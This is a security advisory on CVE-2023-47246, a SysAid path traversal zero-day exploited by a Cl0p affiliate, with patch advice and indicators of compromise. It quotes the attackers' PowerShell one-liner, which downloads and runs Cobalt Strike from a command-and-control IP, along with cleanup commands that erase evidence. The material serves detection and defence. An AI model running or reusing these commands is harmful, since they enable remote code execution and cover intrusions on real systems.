SysAid zero-day flaw exploited by Cl0p hacker gang

published: Nov. 9, 2023

Take action: If you are using SysAid IT support and management software download the patch and apply it ASAP. Such systems usually have an internet facing ticketing inteface which could be used as an attack vector. After patching, make a through review of the system for indicators of compromise. Be aggressive, don't wait for repeat of MOVEit.


Learn More

A critical zero-day vulnerability within the SysAid IT support and management software has been identified as being exploited by Lace Tempest - an affiliate of the Cl0p ransomware group. The recent attacks, described as limited, were detected by Microsoft's Threat Intelligence team and communicated to SysAid on November 2, 2023.

The vulnerability is tracked as CVE-2023-47246 (No CVSS score yet) and is a path traversal vulnerability, which allows attackers unauthorized system access and arbitrary code execution. The attackers exploited this by uploading a WAR archive containing a webshell to the SysAid Tomcat web service, enabling further malicious activities including deploying a malware loader and a trojan into various system processes, and then executing a second PowerShell script to erase evidence of the intrusion. SysAid, upon being notified, launched an incident response protocol and reached out to their on-premise customers with a mitigation solution.

SysAid has released a patch (v23.3.36) to address the vulnerability and is urging customers to update their systems. They have provided indicators of compromise for users to check for any unauthorized access or suspicious activities and to review logs for any unusual behavior that could indicate exploitation:

Hashes

Filename Sha256 Comment
user.exe b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4d Malicious loader

IP Addresses

IP Comment
81.19.138[.]52 GraceWire Loader C2
45.182.189[.]100 GraceWire Loader C2
179.60.150[.]34 Cobalt Strike C2
45.155.37[.]105 Meshagent remote admin tool C2

File Paths

Path Comment
C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe GraceWire
C:\Program Files\SysAidServer\tomcat\webapps\usersfiles.war Archive of WebShells and tools used by the attacker
C:\Program Files\SysAidServer\tomcat\webapps\leave Used as a flag for the attacker scripts during execution

Commands

The following command is used to download and execute CobaltStrike after initial access is established:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://179.60.150[.]34:80/a')

Post-Compromise Cleanup

After initial compromise, the attacker cleans up payloads used to establish an initial foothold on the infected servers, evidence of the following commands being run on SysAid servers indicates successful exploitation:

  • Remove-Item -Path “$tomcat_dir\webapps\usersfiles\leave”.
  • Remove-Item -Force “$wapps\usersfiles.war”.
  • Remove-Item -Force “$wapps\usersfiles\user.*”.
  • & “$wapps\usersfiles\user.exe”.

Antivirus Detections

Microsoft Defender detects the components of this attack as the following threats:

  • Trojan:Win32/TurtleLoader
  • Backdoor:Win32/Clop
  • Ransom:Win32/Clop

SysAid zero-day flaw exploited by Cl0p hacker gang